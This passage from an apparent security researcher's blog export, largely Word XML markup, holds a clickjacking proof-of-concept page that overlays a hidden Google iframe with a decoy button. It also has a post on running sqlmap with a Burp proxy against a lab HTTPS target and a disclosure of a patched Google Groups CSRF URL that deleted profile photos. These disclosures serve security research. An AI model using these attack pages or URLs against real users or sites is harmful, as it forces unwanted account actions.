<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
</w:LatentStyles>
</xml><![endif]--><!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-qformat:yes;
mso-style-parent:"";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin-top:0in;
mso-para-margin-right:0in;
mso-para-margin-bottom:10.0pt;
mso-para-margin-left:0in;
line-height:115%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-fareast-font-family:"Times New Roman";
mso-fareast-theme-font:minor-fareast;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;}
</style>
<![endif]-->
<br />
<div class="MsoNormal" style="background: none repeat scroll 0% 0% rgb(191, 191, 191); font-family: "Courier New",Courier,monospace; text-align: left; text-indent: 0in;">
<span style="font-size: 10pt;"><html></span></div>
<span style="font-family: "Courier New",Courier,monospace;">
</span><div class="MsoNormal" style="background: none repeat scroll 0% 0% rgb(191, 191, 191); font-family: "Courier New",Courier,monospace; text-align: left; text-indent: 0in;">
<span style="font-size: 10pt;"><head></span></div>
<span style="font-family: "Courier New",Courier,monospace;">
</span><div class="MsoNormal" style="background: none repeat scroll 0% 0% rgb(191, 191, 191); font-family: "Courier New",Courier,monospace; text-align: left; text-indent: 0in;">
<span style="font-size: 10pt;"><style></span></div>
<span style="font-family: "Courier New",Courier,monospace;">
</span><div class="MsoNormal" style="background: none repeat scroll 0% 0% rgb(191, 191, 191); font-family: "Courier New",Courier,monospace; text-align: left; text-indent: 0in;">
<span style="font-size: 10pt;">button.dummy{position:absolute;top:8px;left:18px;z-index:-10}</span></div>
<span style="font-family: "Courier New",Courier,monospace;">
</span><div class="MsoNormal" style="background: none repeat scroll 0% 0% rgb(191, 191, 191); font-family: "Courier New",Courier,monospace; text-align: left; text-indent: 0in;">
<br /></div>
<span style="font-family: "Courier New",Courier,monospace;">
</span><div class="MsoNormal" style="background: none repeat scroll 0% 0% rgb(191, 191, 191); font-family: "Courier New",Courier,monospace; text-align: left; text-indent: 0in;">
<span style="font-size: 10pt;">#victim {</span></div>
<span style="font-family: "Courier New",Courier,monospace;">
</span><div class="MsoNormal" style="background: none repeat scroll 0% 0% rgb(191, 191, 191); font-family: "Courier New",Courier,monospace; text-align: left; text-indent: 0in;">
<span style="font-size: 10pt;">opacity: 0;</span></div>
<span style="font-family: "Courier New",Courier,monospace;">
</span><div class="MsoNormal" style="background: none repeat scroll 0% 0% rgb(191, 191, 191); font-family: "Courier New",Courier,monospace; text-align: left; text-indent: 0in;">
<span style="font-size: 10pt;">position: absolute;</span></div>
<span style="font-family: "Courier New",Courier,monospace;">
</span><div class="MsoNormal" style="background: none repeat scroll 0% 0% rgb(191, 191, 191); font-family: "Courier New",Courier,monospace; text-align: left; text-indent: 0in;">
<span style="font-size: 10pt;">top: -640px;</span></div>
<span style="font-family: "Courier New",Courier,monospace;">
</span><div class="MsoNormal" style="background: none repeat scroll 0% 0% rgb(191, 191, 191); font-family: "Courier New",Courier,monospace; text-align: left; text-indent: 0in;">
<span style="font-size: 10pt;">left: -55px;</span></div>
<span style="font-family: "Courier New",Courier,monospace;">
</span><div class="MsoNormal" style="background: none repeat scroll 0% 0% rgb(191, 191, 191); font-family: "Courier New",Courier,monospace; text-align: left; text-indent: 0in;">
<span style="font-size: 10pt;">overflow: hidden;</span></div>
<span style="font-family: "Courier New",Courier,monospace;">
</span><div class="MsoNormal" style="background: none repeat scroll 0% 0% rgb(191, 191, 191); font-family: "Courier New",Courier,monospace; text-align: left; text-indent: 0in;">
<span style="font-size: 10pt;">width:800px;</span></div>
<span style="font-family: "Courier New",Courier,monospace;">
</span><div class="MsoNormal" style="background: none repeat scroll 0% 0% rgb(191, 191, 191); font-family: "Courier New",Courier,monospace; text-align: left; text-indent: 0in;">
<span style="font-size: 10pt;">height: 700px;</span></div>
<span style="font-family: "Courier New",Courier,monospace;">
</span><div class="MsoNormal" style="background: none repeat scroll 0% 0% rgb(191, 191, 191); font-family: "Courier New",Courier,monospace; text-align: left; text-indent: 0in;">
<span style="font-size: 10pt;">}</span></div>
<span style="font-family: "Courier New",Courier,monospace;">
</span><div class="MsoNormal" style="background: none repeat scroll 0% 0% rgb(191, 191, 191); font-family: "Courier New",Courier,monospace; text-align: left; text-indent: 0in;">
<span style="font-size: 10pt;"></style></span></div>
<span style="font-family: "Courier New",Courier,monospace;">
</span><div class="MsoNormal" style="background: none repeat scroll 0% 0% rgb(191, 191, 191); font-family: "Courier New",Courier,monospace; text-align: left; text-indent: 0in;">
<span style="font-size: 10pt;"></head></span></div>
<span style="font-family: "Courier New",Courier,monospace;">
</span><div class="MsoNormal" style="background: none repeat scroll 0% 0% rgb(191, 191, 191); font-family: "Courier New",Courier,monospace; text-align: left; text-indent: 0in;">
<span style="font-size: 10pt;"><body></span></div>
<span style="font-family: "Courier New",Courier,monospace;">
</span><div class="MsoNormal" style="background: none repeat scroll 0% 0% rgb(191, 191, 191); font-family: "Courier New",Courier,monospace; text-align: left; text-indent: 0in;">
<span style="font-size: 10pt;"><button type="button"
class="dummy">Click</button> </span></div>
<span style="font-family: "Courier New",Courier,monospace;">
</span><div class="MsoNormal" style="background: none repeat scroll 0% 0% rgb(191, 191, 191); font-family: "Courier New",Courier,monospace; text-align: left; text-indent: 0in;">
<span style="font-size: 10pt;"><div id=victim></span></div>
<span style="font-family: "Courier New",Courier,monospace;">
</span><div class="MsoNormal" style="background: none repeat scroll 0% 0% rgb(191, 191, 191); font-family: "Courier New",Courier,monospace; text-align: left; text-indent: 0in;">
<span style="font-size: 10pt;"><iframe
src="http://www.google.com/books?op=purge&continue=http://www.google.com/accounts/EditServices"
border=0 scrolling=no width=350 height=900></iframe> </span></div>
<span style="font-family: "Courier New",Courier,monospace;">
</span><div class="MsoNormal" style="background: none repeat scroll 0% 0% rgb(191, 191, 191); font-family: "Courier New",Courier,monospace; text-align: left; text-indent: 0in;">
<span style="font-size: 10pt;"></div> </span></div>
<span style="font-family: "Courier New",Courier,monospace;">
</span><div class="MsoNormal" style="background: none repeat scroll 0% 0% rgb(191, 191, 191); font-family: "Courier New",Courier,monospace; text-align: left; text-indent: 0in;">
<span style="font-size: 10pt;"></body> </span></div>
<span style="font-family: "Courier New",Courier,monospace;">
</span><div class="MsoNormal" style="background: none repeat scroll 0% 0% rgb(191, 191, 191); font-family: "Courier New",Courier,monospace; text-align: left; text-indent: 0in;">
<span style="font-size: 10pt;"></html></span></div>
<br />
<br />
I would like to thanks Google to choosing this bug for reward.<br />
<br /></div>
AMol NAikhttp://www.blogger.com/profile/03701068634043898539noreply@blogger.com7tag:blogger.com,1999:blog-1544325078740292092.post-86737918325872221992011-09-12T01:27:00.000-07:002011-09-12T10:56:12.802-07:00Using sqlmap for testing HTTPS sites<div dir="ltr" style="text-align: left;" trbidi="on">
<b>Update:</b> <i>By default, sqlmap supports SSL. Somehow it didn't worked for my friend. So I tried with --proxy option to find alternate way. </i><br />
<br />
Last week, one of my friends asked me how to use sqlmap against HTTPS sites? I never tried that one but was sure that there will be a way to do it. I quickly checked sqlmap documentation and came across <span style="background-color: #999999;">--proxy</span> switch.<br />
<br />
Somehow my friend didn't managed to work sqlmap with <span style="background-color: #999999;">--proxy</span> switch, So i decided to try it out myself.<br />
<br />
The first thing i did was to read sqlmap documentation about -<span style="background-color: #999999;">-proxy</span> switch.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-X1yiBgrmG0w/Tm2--IZFfGI/AAAAAAAAAYg/TJYSHYpdMwc/s1600/sqlmap-proxy.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="87" src="http://1.bp.blogspot.com/-X1yiBgrmG0w/Tm2--IZFfGI/AAAAAAAAAYg/TJYSHYpdMwc/s400/sqlmap-proxy.jpeg" width="400" /></a></div>
<br />
It's pretty straight to use --proxy switch. It just need to provide proxy details as http://<proxy IP>:<port>. I used burp to test this.<br />
<br />
The target site was running on 192.168.20.129. It has a search page which was vulnerable to SQL Injection and that page has used POST method.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-pZM0dYbWNpM/Tm2--taxfqI/AAAAAAAAAYk/azdiIJggxmQ/s1600/target-site.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="75" src="http://1.bp.blogspot.com/-pZM0dYbWNpM/Tm2--taxfqI/AAAAAAAAAYk/azdiIJggxmQ/s400/target-site.jpeg" width="400" /></a></div>
<br />
To run sqlmap, i used following command:<br />
<span style="background-color: #999999;">./sqlmap.py -u "https://192.168.20.128/1/index.jsp" --data "word=test" --proxy "http://127.0.0.1:8080"</span><br />
<br />
where -u is target URL, --data is POST data and --proxy is burp proxy details.<br />
<br />
Lets' run it.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-5qt7xNe-jlw/Tm2-802klAI/AAAAAAAAAYc/K1sreeoHw-g/s1600/sqlmap-in-action.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="233" src="http://4.bp.blogspot.com/-5qt7xNe-jlw/Tm2-802klAI/AAAAAAAAAYc/K1sreeoHw-g/s400/sqlmap-in-action.jpeg" width="400" /></a></div>
<br />
It works and sqlmap detected the back-end database as MySQL 5.0.<br />
<br />
Hope you will find this useful.</div>
AMol NAikhttp://www.blogger.com/profile/03701068634043898539noreply@blogger.com8tag:blogger.com,1999:blog-1544325078740292092.post-29365100037363691442011-07-28T22:56:00.000-07:002011-07-28T22:56:09.475-07:00Google Groups Profile CSRF<div dir="ltr" style="text-align: left;" trbidi="on">Google Groups profile page was vulnerable to CSRF attack to delete profile picture of an authenticated user. A simple GET request to <a href="http://groups.google.com/groups/profile/addphoto?Action.Delete=1">http://groups.google.com/groups/profile/addphoto?Action.Delete=1</a> would delete user’s current profile picture without his/her knowledge. This was possible due to absence of anti-CSRF measures.<br />
<br />
This vulnerability is currently patched by Google. Here are the snaps of vulnerability in action.<br />
<br />
Before the exploitation:<br />
<br />
<div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-wWe686sD0_I/TjJKE3a_suI/AAAAAAAAAX0/ki-oiXTfzpQ/s1600/new-poc1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="123" src="http://2.bp.blogspot.com/-wWe686sD0_I/TjJKE3a_suI/AAAAAAAAAX0/ki-oiXTfzpQ/s400/new-poc1.JPG" width="400" /></a></div><br />
After CSRF exploitation:<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-H5x4gA7uNDE/TjJKFNm4V3I/AAAAAAAAAX4/yZDHPWsvQGw/s1600/new-poc2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="105" src="http://3.bp.blogspot.com/-H5x4gA7uNDE/TjJKFNm4V3I/AAAAAAAAAX4/yZDHPWsvQGw/s400/new-poc2.JPG" width="400" /></a></div><br />
<br />
<br />
</div>AMol NAikhttp://www.blogger.com/profile/03701068634043898539noreply@blogger.com0tag:blogger.com,1999:blog-1544325078740292092.post-51702214197509226612011-06-30T00:49:00.000-07:002011-06-30T00:49:01.589-07:00Exploit Development with mona.py<!--[if gte mso 9]><xml> <w:WordDocument> <w:View>Normal</w:View> <w:Zoom>0</w:Zoom> <w:TrackMoves/> <w:TrackFormatting/> <w:PunctuationKerning/> <w:ValidateAgainstSchemas/> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:DoNotPromoteQF/> <w:LidThemeOther>EN-US</w:LidThemeOther> <w:LidThemeAsian>X-NONE</w:LidThemeAsian> <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript> <w:Compatibility> <w:BreakWrappedTables/> <w:SnapToGridInCell/> <w:WrapTextWithPunct/> <w:UseAsianBreakRules/> <w:DontGrowAutofit/> <w:SplitPgBreakAndParaMark/> <w:DontVertAlignCellWithSp/> <w:DontBreakConstrainedForcedTables/> <w:DontVertAlignInTxbx/> <w:Word11KerningPairs/> <w:CachedColBalance/> </w:Compatibility> <m:mathPr> <m:mathFont m:val="Cambria Math"/> <m:brkBin m:val="before"/> <m:brkBinSub m:val="--"/> <m:smallFrac m:val="off"/> <m:dispDef/> <m:lMargin m:val="0"/> <m:rMargin m:val="0"/> <m:defJc m:val="centerGroup"/> <m:wrapIndent m:val="1440"/> <m:intLim m:val="subSup"/> <m:naryLim m:val="undOvr"/> </m:mathPr></w:WordDocument> </xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="267"> <w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Normal"/> <w:LsdException Locked="false" Priority="9" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="heading 1"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/> <w:LsdException Locked="false" Priority="39" Name="toc 1"/> <w:LsdException Locked="false" Priority="39" Name="toc 2"/> <w:LsdException Locked="false" Priority="39" Name="toc 3"/> <w:LsdException Locked="false" Priority="39" Name="toc 4"/> <w:LsdException Locked="false" Priority="39" Name="toc 5"/> <w:LsdException Locked="false" Priority="39" Name="toc 6"/> <w:LsdException Locked="false" Priority="39" Name="toc 7"/> <w:LsdException Locked="false" Priority="39" Name="toc 8"/> <w:LsdException Locked="false" Priority="39" Name="toc 9"/> <w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/> <w:LsdException Locked="false" Priority="10" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Title"/> <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/> <w:LsdException Locked="false" Priority="11" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/> <w:LsdException Locked="false" Priority="22" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Strong"/> <w:LsdException Locked="false" Priority="20" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/> <w:LsdException Locked="false" Priority="59" SemiHidden="false"
UnhideWhenUsed="false" Name="Table Grid"/> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/> <w:LsdException Locked="false" Priority="1" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 1"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 1"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 1"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/> <w:LsdException Locked="false" Priority="34" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/> <w:LsdException Locked="false" Priority="29" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Quote"/> <w:LsdException Locked="false" Priority="30" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 1"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 1"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
